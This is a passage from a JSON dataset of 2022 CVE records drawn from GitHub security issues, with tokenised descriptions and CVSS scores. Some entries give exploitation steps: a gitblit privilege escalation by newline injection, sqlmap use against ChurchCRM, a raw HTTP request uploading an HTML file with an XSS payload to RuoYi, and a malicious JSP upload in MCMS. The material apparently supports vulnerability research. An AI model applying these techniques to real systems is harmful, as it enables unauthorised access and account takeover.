  83728. "description": "A user privilege elevation vulnerability in the latest version of gitblit. Hello, I tried to contact the developers of your product but did not get a response, so I decided to raise the vulnerability to you in the issue, hoping that you can fix it as soon as possible to avoid a wider impact of the vulnerability. Principle of the vulnerability Gitblit uses file storage to manage user information, passwords, account types, and permissions. When a user with low privileges modifies their information, if they use line breaks and space characters, they can create new users or assign higher higher privileges. The relevant code logic is in the write function of APITAG . The reason for the problem is that gitblit does not do a checksum on the characters entered by the user, and malicious characters are printed directly in the file, causing gitblit to parse the file incorrectly when reading it. The location where users are saved is in APITAG The default APITAG is as follows. APITAG The user name is admin, the password is admin, and the user's permissions are admin permissions, and the file will change as the user logs in. After logging in once the file reads ERRORTAG If there is a new user, a new user will be created below the user, and which will be accompanied by the user's APITAG information, if the attacker in the modification of their own APITAG the APITAG set to APITAG ,you can modify the permissions of their own user to admin. Vulnerability recurrence NUMBERTAG The attacker has an account with no privileges, username test , password APITAG , and privileges None , and the current APITAG is. ERRORTAG NUMBERTAG After logging in, click on Profile APITAG in order FILETAG Turn on burpsuite's blocking feature, click Save, and block the request with burpsuite NUMBERTAG In burpsuite, make changes to the request. FILETAG Modify the value of APITAG to APITAG after url encoding. 
The APITAG at the end of the payload is to avoid the impact of the original role = \" none\". The encoding can be done using burpsuite's Decode function FILETAG NUMBERTAG After modifying the request body and sending the request, APITAG changes to the following state. FILETAG You can see that the test user has become admin privileges. Refreshing the page, at this point the test user has full access to gitblit, and can see all Git repositories and manage all users and teams FILETAG",
  83729. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83730. "severity": "CRITICAL",
  83731. "baseScore": 9.8,
  83732. "impactScore": 5.9,
  83733. "exploitabilityScore": 3.9
  83734. },
  83735. {
  83736. "CVE_ID": "CVE-2022-31282",
  83737. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/708",
  83738. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/708",
  83739. "Repo_new": "axiomatic-systems/bento4",
  83740. "Issue_Created_At": "2022-05-08T16:25:44Z",
  83741. "description": "SEGV on unknown address NUMBERTAG in PATHTAG SUMMARY: APITAG SEGV on unknown address NUMBERTAG in PATHTAG Version APITAG branch d NUMBERTAG ef NUMBERTAG URLTAG Platform ERRORTAG Steps to reproduce CODETAG Asan ERRORTAG poc: FILETAG Thanks!",
  83742. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83743. "severity": "MEDIUM",
  83744. "baseScore": 5.5,
  83745. "impactScore": 3.6,
  83746. "exploitabilityScore": 1.8
  83747. },
  83748. {
  83749. "CVE_ID": "CVE-2022-31285",
  83750. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/702",
  83751. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/702",
  83752. "Repo_new": "axiomatic-systems/bento4",
  83753. "Issue_Created_At": "2022-05-08T09:35:50Z",
  83754. "description": "allocator is out of memory in PATHTAG SUMMARY: APITAG allocator is out of memory in PATHTAG Version APITAG branch d NUMBERTAG ef NUMBERTAG URLTAG Platform ERRORTAG Steps to reproduce CODETAG Asan ERRORTAG poc: FILETAG Thanks!",
  83755. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83756. "severity": "MEDIUM",
  83757. "baseScore": 5.5,
  83758. "impactScore": 3.6,
  83759. "exploitabilityScore": 1.8
  83760. },
  83761. {
  83762. "CVE_ID": "CVE-2022-31287",
  83763. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/703",
  83764. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/703",
  83765. "Repo_new": "axiomatic-systems/bento4",
  83766. "Issue_Created_At": "2022-05-08T09:38:48Z",
  83767. "description": "requested allocation size NUMBERTAG fffffffffffffffd in PATHTAG SUMMARY: APITAG requested allocation size NUMBERTAG fffffffffffffffd in PATHTAG Version APITAG branch d NUMBERTAG ef NUMBERTAG URLTAG Platform ERRORTAG Steps to reproduce CODETAG Asan ERRORTAG poc: FILETAG Thanks!",
  83768. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83769. "severity": "MEDIUM",
  83770. "baseScore": 5.5,
  83771. "impactScore": 3.6,
  83772. "exploitabilityScore": 1.8
  83773. },
  83774. {
  83775. "CVE_ID": "CVE-2022-31302",
  83776. "Issue_Url_old": "https://github.com/maccmspro/maccms8/issues/1",
  83777. "Issue_Url_new": "https://github.com/maccmspro/maccms8/issues/1",
  83778. "Repo_new": "maccmspro/maccms8",
  83779. "Issue_Created_At": "2022-05-17T01:14:56Z",
  83780. "description": "There are four storage XSS vulnerabilities. Enter the background, click video > server group > add,\u8fdb\u5165\u540e\u53f0\uff0c\u70b9\u51fb\u89c6\u9891 >\u670d\u52a1\u5668\u7ec4 >\u6dfb\u52a0\uff0c \u5728\u5730\u5740\u6846\u63d2\u5165payload NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG \u5728\u5907\u6ce8\u6846\u63d2\u5165payload NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG FILETAG FILETAG \u8fdb\u5165\u540e\u53f0\uff0c\u70b9\u51fb\u89c6\u9891 >\u64ad\u653e\u5668 >\u6dfb\u52a0\uff0c \u5728\u5730\u5740\u6846\u63d2\u5165payload NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG \u5728\u5907\u6ce8\u6846\u63d2\u5165payload NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG FILETAG",
  83781. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  83782. "severity": "MEDIUM",
  83783. "baseScore": 5.4,
  83784. "impactScore": 2.7,
  83785. "exploitabilityScore": 2.3
  83786. },
  83787. {
  83788. "CVE_ID": "CVE-2022-31303",
  83789. "Issue_Url_old": "https://github.com/maccmspro/maccms10/issues/20",
  83790. "Issue_Url_new": "https://github.com/maccmspro/maccms10/issues/20",
  83791. "Repo_new": "maccmspro/maccms10",
  83792. "Issue_Created_At": "2022-05-18T14:36:01Z",
  83793. "description": "\u540e\u53f0\u670d\u52a1\u5668\u7ec4\u4e2d\u5b58\u5728XSS\u6f0f\u6d1e. \u8fdb\u5165\u540e\u53f0\uff0c\u70b9\u51fb\u89c6\u9891 >\u670d\u52a1\u5668\u7ec4 >\u6dfb\u52a0\uff0c \u5728\u540d\u79f0\u6846\u63d2\u5165payload1\uff1a APITAG APITAG alert NUMBERTAG APITAG \u5728\u670d\u52a1\u5668\u7ec4\u5730\u5740\u6846\u63d2\u5165payload2\uff1a APITAG APITAG alert NUMBERTAG APITAG \u5728\u6392\u5e8f\u6846\u63d2\u5165payload3\uff1a APITAG APITAG alert NUMBERTAG APITAG \u5728\u63d0\u793a\u6846\u63d2\u5165payload4\uff1a APITAG APITAG alert NUMBERTAG APITAG FILETAG \u70b9\u51fb\u4fdd\u5b58\uff0c\u6210\u529f\u89e6\u53d1XSS\u6f0f\u6d1e FILETAG",
  83794. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  83795. "severity": "MEDIUM",
  83796. "baseScore": 5.4,
  83797. "impactScore": 2.7,
  83798. "exploitabilityScore": 2.3
  83799. },
  83800. {
  83801. "CVE_ID": "CVE-2022-31307",
  83802. "Issue_Url_old": "https://github.com/nginx/njs/issues/482",
  83803. "Issue_Url_new": "https://github.com/nginx/njs/issues/482",
  83804. "Repo_new": "nginx/njs",
  83805. "Issue_Created_At": "2022-03-02T11:46:11Z",
  83806. "description": "SEGV APITAG in njs_string_offset. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
  83807. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83808. "severity": "MEDIUM",
  83809. "baseScore": 5.5,
  83810. "impactScore": 3.6,
  83811. "exploitabilityScore": 1.8
  83812. },
  83813. {
  83814. "CVE_ID": "CVE-2022-31313",
  83815. "Issue_Url_old": "https://github.com/rakeshrkz7/as_api_res/issues/1",
  83816. "Issue_Url_new": "https://github.com/rakeshrkz7/as_api_res/issues/1",
  83817. "Repo_new": "rakeshrkz7/as_api_res",
  83818. "Issue_Created_At": "2022-05-17T12:06:02Z",
  83819. "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project in APITAG and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip3 install api res py i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG Your project in APITAG URLTAG",
  83820. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83821. "severity": "CRITICAL",
  83822. "baseScore": 9.8,
  83823. "impactScore": 5.9,
  83824. "exploitabilityScore": 3.9
  83825. },
  83826. {
  83827. "CVE_ID": "CVE-2022-31325",
  83828. "Issue_Url_old": "https://github.com/ChurchCRM/CRM/issues/6005",
  83829. "Issue_Url_new": "https://github.com/churchcrm/crm/issues/6005",
  83830. "Repo_new": "churchcrm/crm",
  83831. "Issue_Created_At": "2022-05-17T16:53:06Z",
  83832. "description": "SQL Injection vulnerability in APITAG NUMBERTAG ia FILETAG . SQL Injection vulnerability in APITAG NUMBERTAG ia FILETAG . Step to exploit NUMBERTAG Login as admin NUMBERTAG Redirect to profile page and click on APITAG . FILETAG NUMBERTAG Submit APITAG Came\" notes and capture request in Burp Suite. FILETAG NUMBERTAG Save request and run sqlmap for injecting the APITAG parameter: APITAG FILETAG FILETAG",
  83833. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83834. "severity": "HIGH",
  83835. "baseScore": 7.2,
  83836. "impactScore": 5.9,
  83837. "exploitabilityScore": 1.2
  83838. },
  83839. {
  83840. "CVE_ID": "CVE-2022-31386",
  83841. "Issue_Url_old": "https://github.com/Fanli2012/nbnbk/issues/5",
  83842. "Issue_Url_new": "https://github.com/fanli2012/nbnbk/issues/5",
  83843. "Repo_new": "fanli2012/nbnbk",
  83844. "Issue_Created_At": "2022-05-19T11:53:11Z",
  83845. "description": "FILETAG",
  83846. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  83847. "severity": "CRITICAL",
  83848. "baseScore": 9.1,
  83849. "impactScore": 5.2,
  83850. "exploitabilityScore": 3.9
  83851. },
  83852. {
  83853. "CVE_ID": "CVE-2022-31390",
  83854. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/75",
  83855. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/75",
  83856. "Repo_new": "cherry-toto/jizhicms",
  83857. "Issue_Created_At": "2022-05-23T02:01:23Z",
  83858. "description": "FILETAG",
  83859. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  83860. "severity": "CRITICAL",
  83861. "baseScore": 9.1,
  83862. "impactScore": 5.2,
  83863. "exploitabilityScore": 3.9
  83864. },
  83865. {
  83866. "CVE_ID": "CVE-2022-31393",
  83867. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/76",
  83868. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/76",
  83869. "Repo_new": "cherry-toto/jizhicms",
  83870. "Issue_Created_At": "2022-05-23T02:11:27Z",
  83871. "description": "FILETAG",
  83872. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  83873. "severity": "CRITICAL",
  83874. "baseScore": 9.1,
  83875. "impactScore": 5.2,
  83876. "exploitabilityScore": 3.9
  83877. },
  83878. {
  83879. "CVE_ID": "CVE-2022-31501",
  83880. "Issue_Url_old": "https://github.com/github/securitylab/issues/669",
  83881. "Issue_Url_new": "https://github.com/github/securitylab/issues/669",
  83882. "Repo_new": "github/securitylab",
  83883. "Issue_Created_At": "2022-04-28T19:02:52Z",
  83884. "description": "Python : Flask Path Traversal Vulnerability. CVE(s) ID list This is a placeholder issue. I plan on sending bulk PR's to appro NUMBERTAG projects. I will add the CVE once the fixes are merged and identifiers are assigned. All For One submission URLTAG Details TBA Are you planning to discuss this vulnerability submission publicly? APITAG Post, social networks, etc). [X] Yes [ ] No Blog post link _No response_",
  83885. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
  83886. "severity": "CRITICAL",
  83887. "baseScore": 9.3,
  83888. "impactScore": 4.7,
  83889. "exploitabilityScore": 3.9
  83890. },
  83891. {
  83892. "CVE_ID": "CVE-2022-31506",
  83893. "Issue_Url_old": "https://github.com/cmusatyalab/opendiamond/issues/52",
  83894. "Issue_Url_new": "https://github.com/cmusatyalab/opendiamond/issues/52",
  83895. "Repo_new": "cmusatyalab/opendiamond",
  83896. "Issue_Created_At": "2022-05-03T18:49:15Z",
  83897. "description": "Security Vulnerability Found. Absolute Path Traversal due to incorrect use of APITAG call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system including application source code or configuration and critical system files. This attack is also known as \u201cdot dot slash\u201d, \u201cdirectory traversal\u201d, \u201cdirectory climbing\u201d and \u201cbacktracking\u201d. Common Weakness Enumeration category CWE NUMBERTAG Root Cause Analysis The APITAG call is unsafe for use with untrusted input. When the APITAG call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. CODETAG Since the \"malicious\" parameter represents an absolute path, the result of APITAG ignores the static directory completely. Hence, untrusted input passed via the APITAG call to APITAG can lead to path traversal attacks. In this case, the problem occurs due to the following code : URLTAG Here, the APITAG parameter is attacker controlled. This parameter passes through the unsafe APITAG call making the effective directory and filename passed to the APITAG call attacker controlled. This leads to a path traversal attack. Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. APITAG Remediation This can be fixed by preventing flow of untrusted data to the vulnerable APITAG function. In case the application logic necessitates this behaviour, one can either use the APITAG to join untrusted paths or replace APITAG calls with APITAG calls; in either case the resulting path should be normalized and checked to still lie inside the intended base directory before it is opened. 
Common Vulnerability Scoring System Vector The attack can be carried out over the network. A complex, non-standard configuration or a specialized condition is not required for the attack to be successfully conducted. There is no user interaction required for successful execution. The attack can affect components outside the scope of the target module. The attack can be used to gain access to confidential files like passwords, login credentials and other secrets. It cannot be directly used to effect a change on a system resource, so it has limited to no impact on integrity. Using this attack vector an attacker may make multiple requests for huge files such as a database, which can lead to a partial denial of service; however, the impact on availability is quite low in this case. Taking this into account, an appropriate CVSS NUMBERTAG ector would be ( PATHTAG ) FILETAG This gives it a base score of NUMBERTAG and a severity rating of critical. References [OWASP Path Traversal URLTAG github/securitylab NUMBERTAG This bug was found using FILETAG",
  83898. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
  83899. "severity": "CRITICAL",
  83900. "baseScore": 9.3,
  83901. "impactScore": 4.7,
  83902. "exploitabilityScore": 3.9
  83903. },
  83904. {
  83905. "CVE_ID": "CVE-2022-31558",
  83906. "Issue_Url_old": "https://github.com/tooxie/shiva-server/issues/189",
  83907. "Issue_Url_new": "https://github.com/tooxie/shiva-server/issues/189",
  83908. "Repo_new": "tooxie/shiva-server",
  83909. "Issue_Created_At": "2022-05-03T12:02:35Z",
  83910. "description": "Security Vulnerability Found. Absolute Path Traversal due to incorrect use of APITAG call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system including application source code or configuration and critical system files. This attack is also known as \u201cdot dot slash\u201d, \u201cdirectory traversal\u201d, \u201cdirectory climbing\u201d and \u201cbacktracking\u201d. Common Weakness Enumeration category CWE NUMBERTAG Root Cause Analysis The APITAG call is unsafe for use with untrusted input. When the APITAG call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. CODETAG Since the \"malicious\" parameter represents an absolute path, the result of APITAG ignores the static directory completely. Hence, untrusted input passed via the APITAG call to APITAG can lead to path traversal attacks. In this case, the problem occurs due to the following code : URLTAG Here, the APITAG parameter is attacker controlled. This parameter passes through the unsafe APITAG call making the effective directory and filename passed to the APITAG call attacker controlled. This leads to a path traversal attack. Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. APITAG Remediation This can be fixed by preventing flow of untrusted data to the vulnerable APITAG function. In case the application logic necessitates this behaviour, one can either use the APITAG to join untrusted paths or replace APITAG calls with APITAG calls; in either case the resulting path should be normalized and checked to still lie inside the intended base directory before it is opened. 
Common Vulnerability Scoring System Vector The attack can be carried out over the network. A complex, non-standard configuration or a specialized condition is not required for the attack to be successfully conducted. There is no user interaction required for successful execution. The attack can affect components outside the scope of the target module. The attack can be used to gain access to confidential files like passwords, login credentials and other secrets. It cannot be directly used to effect a change on a system resource, so it has limited to no impact on integrity. Using this attack vector an attacker may make multiple requests for huge files such as a database, which can lead to a partial denial of service; however, the impact on availability is quite low in this case. Taking this into account, an appropriate CVSS NUMBERTAG ector would be ( PATHTAG ) FILETAG This gives it a base score of NUMBERTAG and a severity rating of critical. References [OWASP Path Traversal URLTAG github/securitylab NUMBERTAG This bug was found using FILETAG",
  83911. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
  83912. "severity": "CRITICAL",
  83913. "baseScore": 9.3,
  83914. "impactScore": 4.7,
  83915. "exploitabilityScore": 3.9
  83916. },
  83917. {
  83918. "CVE_ID": "CVE-2022-31581",
  83919. "Issue_Url_old": "https://github.com/scorelab/OpenMF/issues/262",
  83920. "Issue_Url_new": "https://github.com/scorelab/openmf/issues/262",
  83921. "Repo_new": "scorelab/openmf",
  83922. "Issue_Created_At": "2022-05-03T12:25:30Z",
  83923. "description": "Security Vulnerability Found. Absolute Path Traversal due to incorrect use of APITAG call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system including application source code or configuration and critical system files. This attack is also known as \u201cdot dot slash\u201d, \u201cdirectory traversal\u201d, \u201cdirectory climbing\u201d and \u201cbacktracking\u201d. Common Weakness Enumeration category CWE NUMBERTAG Root Cause Analysis The APITAG call is unsafe for use with untrusted input. When the APITAG call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. CODETAG Since the \"malicious\" parameter represents an absolute path, the result of APITAG ignores the static directory completely. Hence, untrusted input passed via the APITAG call to APITAG can lead to path traversal attacks. In this case, the problem occurs due to the following code : URLTAG Here, the APITAG parameter is attacker controlled. This parameter passes through the unsafe APITAG call making the effective directory and filename passed to the APITAG call attacker controlled. This leads to a path traversal attack. Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. APITAG Remediation This can be fixed by preventing flow of untrusted data to the vulnerable APITAG function. In case the application logic necessitates this behaviour, one can either use the APITAG to join untrusted paths or replace APITAG calls with APITAG calls; in either case the resulting path should be normalized and checked to still lie inside the intended base directory before it is opened. 
Common Vulnerability Scoring System Vector The attack can be carried out over the network. A complex, non-standard configuration or a specialized condition is not required for the attack to be successfully conducted. There is no user interaction required for successful execution. The attack can affect components outside the scope of the target module. The attack can be used to gain access to confidential files like passwords, login credentials and other secrets. It cannot be directly used to effect a change on a system resource, so it has limited to no impact on integrity. Using this attack vector an attacker may make multiple requests for huge files such as a database, which can lead to a partial denial of service; however, the impact on availability is quite low in this case. Taking this into account, an appropriate CVSS NUMBERTAG ector would be ( PATHTAG ) FILETAG This gives it a base score of NUMBERTAG and a severity rating of critical. References [OWASP Path Traversal URLTAG github/securitylab NUMBERTAG This bug was found using FILETAG",
  83924. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
  83925. "severity": "CRITICAL",
  83926. "baseScore": 9.3,
  83927. "impactScore": 4.7,
  83928. "exploitabilityScore": 3.9
  83929. },
  83930. {
  83931. "CVE_ID": "CVE-2022-31783",
  83932. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/1214",
  83933. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/1214",
  83934. "Repo_new": "liblouis/liblouis",
  83935. "Issue_Created_At": "2022-05-21T13:15:50Z",
  83936. "description": "FILETAG FILETAG POC FILETAG",
  83937. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83938. "severity": "MEDIUM",
  83939. "baseScore": 5.5,
  83940. "impactScore": 3.6,
  83941. "exploitabilityScore": 1.8
  83942. },
  83943. {
  83944. "CVE_ID": "CVE-2022-31796",
  83945. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/71",
  83946. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/71",
  83947. "Repo_new": "thorfdbg/libjpeg",
  83948. "Issue_Created_At": "2022-05-24T03:23:18Z",
  83949. "description": "heap overflow in APITAG There is a heap overflow in APITAG in APITAG reproduce steps NUMBERTAG unzip FILETAG NUMBERTAG compile libjpeg with address sanitizer enabled NUMBERTAG run jpeg ./poc /dev/null poc FILETAG stack trace ERRORTAG",
  83950. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83951. "severity": "MEDIUM",
  83952. "baseScore": 6.5,
  83953. "impactScore": 3.6,
  83954. "exploitabilityScore": 2.8
  83955. },
  83956. {
  83957. "CVE_ID": "CVE-2022-31830",
  83958. "Issue_Url_old": "https://github.com/fex-team/kityminder/issues/345",
  83959. "Issue_Url_new": "https://github.com/fex-team/kityminder/issues/345",
  83960. "Repo_new": "fex-team/kityminder",
  83961. "Issue_Created_At": "2022-05-25T12:23:32Z",
  83962. "description": "FILETAG",
  83963. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  83964. "severity": "CRITICAL",
  83965. "baseScore": 9.1,
  83966. "impactScore": 5.2,
  83967. "exploitabilityScore": 3.9
  83968. },
  83969. {
  83970. "CVE_ID": "CVE-2022-31836",
  83971. "Issue_Url_old": "https://github.com/beego/beego/issues/4961",
  83972. "Issue_Url_new": "https://github.com/beego/beego/issues/4961",
  83973. "Repo_new": "beego/beego",
  83974. "Issue_Created_At": "2022-05-23T12:59:50Z",
  83975. "description": "Function APITAG uses APITAG to handle APITAG , which may lead to a directory-traversal risk in route matching. Function APITAG uses APITAG to handle APITAG , which may lead to a directory-traversal risk. poc1: a route ending with APITAG can use APITAG to traverse directories and set an evil value for APITAG . URLTAG URLTAG For route APITAG , the urls below can match, and set APITAG APITAG APITAG APITAG note: ./ can be repeated any number of times Test code as below: CODETAG FILETAG poc2: a regex route can use APITAG to traverse directories and replace the wildcard with an evil value URLTAG For regex route APITAG , the urls below can match and the value of APITAG APITAG can be replaced with an evil value. APITAG APITAG APITAG note: ./ can be repeated any number of times CODETAG FILETAG",
  83976. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83977. "severity": "CRITICAL",
  83978. "baseScore": 9.8,
  83979. "impactScore": 5.9,
  83980. "exploitabilityScore": 3.9
  83981. },
  83982. {
  83983. "CVE_ID": "CVE-2022-31943",
  83984. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/95",
  83985. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/95",
  83986. "Repo_new": "ming-soft/mcms",
  83987. "Issue_Created_At": "2022-05-27T15:05:46Z",
  83988. "description": "Mcms NUMBERTAG URLTAG \u628a\u6e90\u7801\u8003\u4e0b\u6765\u4e4b\u540e APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u53ef\u4ee5\u4e0a\u4f20zip\uff0c\u53ef\u4ee5\u901a\u8fc7zip\u5305\u542bjsp\u6076\u610f\u6587\u4ef6\u4e0a\u4f20\u4e0a\u53bb \u7136\u540e\u8c03\u7528\u8fd9\u4e2a\u63a5\u53e3\u53bb\u89e3\u6790zip\u5e76\u89e3\u6790\u6811jsp\u5e76\u8bbf\u95ee\u3002 APITAG NUMBERTAG zip APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG .",
  83989. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83990. "severity": "CRITICAL",
  83991. "baseScore": 9.8,
  83992. "impactScore": 5.9,
  83993. "exploitabilityScore": 3.9
  83994. },
  83995. {
  83996. "CVE_ID": "CVE-2022-32065",
  83997. "Issue_Url_old": "https://github.com/yangzongzhuan/RuoYi/issues/118",
  83998. "Issue_Url_new": "https://github.com/yangzongzhuan/ruoyi/issues/118",
  83999. "Repo_new": "yangzongzhuan/ruoyi",
  84000. "Issue_Created_At": "2022-05-15T23:58:57Z",
  84001. "description": "Vulnerability: The html file can be uploaded where the avatar is uploaded, resulting in stored XSS. Vulnerability disclosure Vulnerability title: The html file can be uploaded where the avatar is uploaded, resulting in stored XSS Product: URLTAG Affected Versions NUMBERTAG the lastest vesion) Discovery time: APITAG Found by: solarpeng NUMBERTAG Exploit sence: The System allows multiple users to log in. If a user is granted user management rights, he can insert a malicious xss payload on user management page, so that all users with this permission can access and trigger an xss attack Analysis report NUMBERTAG If you are not Chinese,please change the language into the English through Browser translation plugin such as Google NUMBERTAG After deployment, enter the background management page FILETAG NUMBERTAG Click the avatar into the personal center FILETAG NUMBERTAG Click the \"modify avatar\",and upload a normal image,the click OK button FILETAG FILETAG NUMBERTAG Intercept the request package with a packet capture tool such as burp, change the file suffix to html, and change the content with xss payload such as \" APITAG alert NUMBERTAG APITAG ,then pass the request,and the response shows APITAG means upload success FILETAG FILETAG FILETAG NUMBERTAG Refresh the index page,start burp,and then click the avatar again,the burp will intercept the xss html that we upload FILETAG FILETAG NUMBERTAG Copy the html url,and then send to the other users using Ruoyi cms,if they click,the xss attack is triggered FILETAG POC: POST PATHTAG HTTP NUMBERTAG Host: mysite.com User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate X Requested With: APITAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Origin: FILETAG Connection: close Referer: URLTAG Cookie: Your cookies 
NUMBERTAG Content Disposition: form data; name=\"avatarfile\"; APITAG Content Type: image/png APITAG alert NUMBERTAG APITAG NUMBERTAG Fixes: The backend should validate the file extension server-side (the client-supplied filename and Content-Type cannot be trusted, as the intercepted request above shows) and reject HTML uploads; alternatively, check the content of the uploaded file and filter XSS payloads.",
  84002. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  84003. "severity": "MEDIUM",
  84004. "baseScore": 5.4,
  84005. "impactScore": 2.7,
  84006. "exploitabilityScore": 2.3
  84007. },
  84008. {
  84009. "CVE_ID": "CVE-2022-32124",
  84010. "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/3",
  84011. "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/3",
  84012. "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
  84013. "Issue_Created_At": "2022-05-30T09:02:33Z",
  84014. "description": "There are multiple reflected XSS vulnerabilities in this website. Vulnerability APITAG XSS Vulnerability APITAG risk Affected version\uff1a Vulnerability APITAG APITAG are some places I found NUMBERTAG url\uff1a URLTAG Affected parameters\uff1aselect & input NUMBERTAG url\uff1a URLTAG Affected parameters\uff1aselect & input NUMBERTAG url\uff1a URLTAG Affected parameters\uff1awd NUMBERTAG url\uff1a URLTAG Affected parameters\uff1awd NUMBERTAG url\uff1a URLTAG Affected parameters\uff1arepeat NUMBERTAG url: URLTAG NUMBERTAG url: URLTAG NUMBERTAG url: URLTAG",
  84015. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  84016. "severity": "MEDIUM",
  84017. "baseScore": 6.1,
  84018. "impactScore": 2.7,
  84019. "exploitabilityScore": 2.8
  84020. },
  84021. {
  84022. "CVE_ID": "CVE-2022-32200",
  84023. "Issue_Url_old": "https://github.com/davea42/libdwarf-code/issues/116",
  84024. "Issue_Url_new": "https://github.com/davea42/libdwarf-code/issues/116",
  84025. "Repo_new": "davea42/libdwarf-code",
  84026. "Issue_Created_At": "2022-05-26T10:00:03Z",
  84027. "description": "heap overflow in _dwarf_check_string_valid in dwarf_util.c. There is a heap overflow in _dwarf_check_string_valid in dwarf_util.c. Depending on the usage of this library, this may cause code execution or denial of service. reproduce steps NUMBERTAG compile libdwarf with address sanitizer NUMBERTAG run dwarfdump with poc file APITAG poc: FILETAG Address sanitizer output: ERRORTAG",
  84028. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84029. "severity": "HIGH",
  84030. "baseScore": 7.8,
  84031. "impactScore": 5.9,
  84032. "exploitabilityScore": 1.8
  84033. },
  84034. {
  84035. "CVE_ID": "CVE-2022-32201",
  84036. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/73",
